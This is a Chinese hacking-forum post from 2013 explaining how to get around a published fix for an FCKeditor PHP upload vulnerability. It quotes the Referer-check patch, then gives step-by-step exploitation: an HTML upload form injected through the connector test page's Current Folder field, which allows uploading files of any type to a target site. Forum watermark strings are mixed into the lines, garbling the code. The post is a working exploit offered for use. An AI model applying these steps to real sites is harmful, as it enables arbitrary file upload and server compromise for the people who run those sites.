找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2305|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
; U) s: d  S# f+ N网上给出的修复方案是
# r/ c9 p: X+ O3 z. H- T) ^# q修复方法,删除FCK编辑器用其他的编辑器
5 K9 v$ s, n* g或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
. `9 S, y+ B4 W: \, S3 s" V" h/ J1 x+ s5 r' ?6 S- s+ R/ P$ C
require(‘config.php’);
7 A% S( K3 k% U' B1 k. d3 M" Hrequire(‘util.php’);5 I1 B* S% R1 [2 l
的下面添加以下代码—————————–% b/ M0 H/ |3 N5 R) j3 G0 {8 c
//防止外部提交4 s/ {# f- I* w! I, a* t' P
function outsidepost()
' D4 u; I0 U1 r0 q5 `{
& I- j/ Y% y; Z$ o% s4 }! R) c$servername=$_SERVER['SERVER_NAME'];% i. ^+ U; ]4 x' R! p' f
$sub_from=@$_SERVER['HTTP_REFERER'];
3 p; y5 j5 a2 y. N1 I8 A& e$sub_len=strlen($servername);
+ P- {2 p5 d5 J$checkfrom=substr($sub_from,7,$sub_len);
, E( A7 ]  X0 K8 Z4 M% B# b: e! dif($checkfrom!=$servername){% G; w3 U/ t/ _" `, D" E
echo(“you don’t outsidepost!”);
' K( _- a9 Z8 nexit;% n. N3 G' f$ D; S; r& K: V! g
}- ]; Z# R" M/ L0 {; k! [3 R
}3 N, G, L2 A* _. A! |
outsidepost();
+ [" _/ q0 s5 n防止外部提交,但是没有防止内部提交,7 ?. X4 T) ?$ f
利用方法:
9 s3 w# P/ r- u1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html# W! s6 F( z4 j- G! Z, C7 W
2,在Current Folder 框输入
( v9 |$ J. Q7 i4 A  Y3 w<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>0 g( g. \5 ]; ^: Y9 G* f5 N
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
6 X- A, k! W2 n* o: q; \7 H; D; n$ yPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表